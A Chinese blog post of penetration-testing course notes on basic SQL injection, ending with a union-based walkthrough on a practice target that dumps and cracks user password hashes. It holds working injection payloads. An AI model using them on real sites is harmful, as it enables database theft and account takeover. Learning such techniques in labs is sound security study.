第12天-Web漏洞——SQL注入之简易sql注入

已于 2022-03-14 20:31:04 修改
阅读量1.2k 收藏 4
点赞数
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: sql 前端 数据库
于 2022-01-19 18:20:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/122587026
版权
SQL注入

SQL注入就是一种通过操作输入来修改后台SQL语句达到代码执行进行攻击目的的技术

sql注入产生原因

接收数据 拼接数据 数据库执行 结果展示— 四个步骤,过程中处理不当就可能会存在注入漏洞

sql注入漏洞,取决于过滤严谨与否,过滤严谨,基本不可能存在sql注入漏洞,反之,就可能存在!

SQL注入的危害

1.危害数据库里的数据

2.直接危害网站的权限

SQL 注入知识结构

在这里插入图片描述

mysql数据库注入

在这里插入图片描述

mysql数据库

数据库A=网站A=数据库用户A
表名——> 列名 ——> 数据(目标)

数据库B=网站B=数据库用户B

数据库C=网站C=数据库用户C

如何判定是否存在注入点?

老办法:

and 1=1 页面正常

and 1=2 页面异常

原理:

SELECT * FROM users WHERE id=1 LIMIT 0,1

SELECT * FROM users WHERE id=1 and 1=1 LIMIT 0,1 正常

SELECT * FROM users WHERE id=1 and 1=2 LIMIT 0,1 错误

逻辑运算(与 或 非)

真 且 真 = 真

真 且 假 = 假

真 或 假 = 真

SELECT * FROM users WHERE id=1 真

and(且) 1=1 真 =真

and(且) 1=2 假 =假

不要局限于此

SELECT * FROM users WHERE id=1xxxx(随意、怎么舒服怎么来!) LIMIT 0,1

随意输入内容后

对网页有影响说明带入数据库进行查询 有注入点。

对网页没有影响说明没有带入数据库查询

出现404(或者其他、如:跳转主页)说明对输入进行检测 基本没有sql漏洞

猜测列名数量(字段数)

order by x(数字-不断尝试)

正常值 网页正常显示

错误值 错误网页报错

信息收集:

数据库版本:version()

数据库名字:database()

数据库用户:user()

操作系统: @@version_compile_os

视频中出现的题目

1.可能存在注入的编号选项有哪几个?
1-www.xiaodi8.com/index.php?id=8
2-www.xiaodi8.com/?id=10
3-www.xiaodi8.com/?id=10&x=1
4-www.xiaodi8.com/index.php(post注入)

答案:1234

2.参数有x注入,以下哪个注入测试正确
A.www.xiaodi8.com/new/php?y=1 and 1=1&x=2
B.www.xiaodi8.com/new/php?y=1&x=2 and 1=1
C.www.xiaodi8.com/new/php?y=1 and 1=1 & x=2 and 1=1
D.www.xiaodi8.com/new/php?xx=1 and 1=1&xxx=2 and 1=1

答案:BC

墨者靶机真实 MYSQL 注入实现

SQL手工注入漏洞测试(MySQL数据库)SQL注入_在线靶场

?id=1 and 1=1 显示正常

在这里插入图片描述

?id=1 and 1=2 显示异常
在这里插入图片描述

判断存在注入点

order by x 尝试判断列名数

order by 6

在这里插入图片描述

order by 5 显示同6

order by 4 有显示变化

在这里插入图片描述

id=-1 union select 1,2,3,4

在这里插入图片描述

发现回显点应该在3上

id=-1 union select 1,2,version(),4

在这里插入图片描述

id=-1 union select 1,2,database(),4

在这里插入图片描述

id=-1 union select 1,2,user(),4

在这里插入图片描述

id=-1 union select 1,2,@@version_compile_os,4

在这里插入图片描述

信息收集:

数据库版本:version() 5.7.22-0ubuntu0.16.04.1

数据库名字:database() mozhe_Discuz_StormGroup

数据库用户:user() root@localhost

操作系统:@@version_compile_os Linux

已知数据库名 mozhe_Discuz_StormGroup

下一步,查看表名

219.153.49.228:46695/new_list.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=%27mozhe_Discuz_StormGroup%27

在这里插入图片描述

得到表名:StormGroup_member,notice

http://219.153.49.228:46695/new_list.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=‘StormGroup_member’

在这里插入图片描述

得到列名:id,name,password,status ,查询 name password

http://219.153.49.228:46695/new_list.php?id=-1 union select 1,2,group_concat(name,“10086”,password),4 from StormGroup_member

在这里插入图片描述

mozhe10086356f589a7df439f6f744ff19bb8092c0,mozhe10086b46338541e2cdce28687c89c029cfc7a

根据题目提示

在这里插入图片描述

密码应该是经过MD5加密过

356f589a7df439f6f744ff19bb8092c0---------->dsan13

b46338541e2cdce28687c89c029cfc7a-------->607466

两个账号密码

mozhe dsan13

mozhe 607466

尝试登录获取key

在这里插入图片描述

IsecNoob
关注
专栏目录
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
软件测试实例——总结
ChenBinBini的博客
09-08 7536
目录1、给你一个字符串,你怎么判断是不是 ip 地址? 手写这段代码,并写出测试用例 1、给你一个字符串,你怎么判断是不是 ip 地址? 手写这段代码,并写出测试用例 考点:编程/算法 IP 的格式:(1-255).(0-255).(0-255).(0-255) 方法一:基于对字符串的处理 public static void main(String[] args){ Scanner scanner = new Scanner(System.in); String ipStr = scanner.nex
web漏洞SQL注入
Bin的博客
04-02 698
目录 一、概述 1.1什么是SQL注入 1.2原理 二、分类 2.1按照数据提交方式分类 2.2按照注入点类型来分类 2.3按照执行效果来分类 三、注入流程 四、验证方法 3.1数字型注入验证 3.2字符型注入验证 五、攻击方法 5.1猜解SQL查询语句中的字段数 5.2找回显点 5.3获取数据库名称 5.4查询表名 5.5查询字段 5.6查信息 六、防御方法...
12WEB漏洞-SQL注入之简要SQL注入
cailme的博客
04-24 144
渗透测试day12
12篇:WEB漏洞~SQL注入~简要SQL注入
廖一语山的博客
09-24 1589
目录前言正文 前言   在本系列课程学习中,SQL注入漏洞将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 学习顺序:从右往左、从上往下 正文 忍者安全测试系统使用说明 #上述思维导图简要说明 #SQL注入安全测试中的危害 #SQL注入产生原理详细分析 可控变量,带入数据库查询,变量未存在过滤或过滤不严重 #搭建第一个SQL注入学习
web23最简单的SQL注入
weixin_59453707的博客
08-08 257
打开靶场 首先随便输入adminadmin 没有报错,但是清空了 输入万能密匙1'or1=1# 同样被清空了 题目提示有sql注入,那就使用burp抓包,发送到repeater
Web漏洞SQL注入
weixin_51614272的博客
05-08 2356
目录SQL语句什么是sql注入sql注入的原理有关sql注入产生的条件SQL查询语句selectWHERE :SQL常用聚合函数:union、limit其他 SQL语句 什么是sql注入? 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵,对于sql注入可以把它归为一句话:所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器
SQL注入——渗透day06
qq_62716256的博客
08-12 1006
SQL注入——渗透day06
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9437
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8011
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
struts2技巧,笔记.zip指定404,500页面 utf-8过滤器 防SQL注入 解决乱码
01-24
struts2技巧,笔记.zip 指定404,500页面 utf-8过滤器 防SQL注入 解决乱码
简单的SQL注入
qq_43776408的博客
08-31 275
package abc; import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.util.Scanner; public class MySQL1 { public static ...
WEB漏洞-SQL注入之简要SQL注入
硫酸超的博客
07-27 468
@[TOC]WEB漏洞-SQL注入之简要SQL注入 前言 在本系列课程学习中,SQL注入漏洞是将是重点部分,其中SQL注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。 SQL注入安全测试中危害 分为两类:危害数据库里的数据、直接危害到网站的权限(需要满足条件) SQL注入产生原理详细分析 见案例 SQL语句在定义的时候没有变量,就不能进行SQL注入 可控变量,带
Web的基本漏洞--SQL注入漏洞
尽欢的博客
05-31 3770
SQL注入介绍
网络安全基础技术扫盲篇 — 常见web漏洞SQL注入
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-01 573
如果你也想学习:黑客&网络安全的SQL攻防知识宝库在此藏,一键关注获宝藏是一种Web应用程序中的安全漏洞,它允许攻击者通过在用户输入中插入恶意的SQL代码,来执行非授权的数据库操作。具体来说,当应用程序将用户输入的数据直接拼接到SQL查询语句中而没有充分验证或转义时,攻击者可以利用这个漏洞来修改原本的查询意图,甚至获取、修改或删除数据库中的数据。SQL注入攻击的原理是用户输入的数据被当成SQL代码执行。
sql注入 练手网站_简单SQL注入的手工测试
weixin_32364911的博客
02-04 1358
练习基础模块41、判断闭合字符和列数正常显示内容双引号闭合 " 显示正常页面这个就不是闭合字符双引号和单引号闭合 "' 显示报错页面这个就不是闭合字符由图片来开还有括号的存在 )尝试闭合字符 -- - 成功接下来获取表的列数order by 5 -- -这个报错说明 数据表的列数为42、获取数据的数据回显点和数据获取数据在第二行的地方可以查询回显数据数据库查询 leettime_761wHole查...
web基础漏洞SQL注入漏洞
m0_62274649的博客
10-04 985
sql漏洞基础,仍需完善
WEB安全漏洞30讲》(第1讲)SQL注入漏洞
午夜安全
04-20 3055
工作多年后,我打算将Web漏洞做一个整理记录,一方面方便自己,另一方面方便想要学习或转行网络安全行业的小伙伴,从本文开始,我将从漏洞原理、漏洞测试、漏洞修复等方面详细讲解Web安全系列漏洞SQL注入漏洞,就是通过把SQL命令插入到URL地址、Web表单提交或页面请求的查询字符串中,最终达到欺骗服务器执行恶意的SQL 命令。漏洞成因是程序没有对用户输入的内容进行安全检查,直接代入数据库进行查询,导致了sql注入的发生。SQL注入漏洞包括:union注入、boolean注入、报错注入、时间盲注、堆叠查询注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值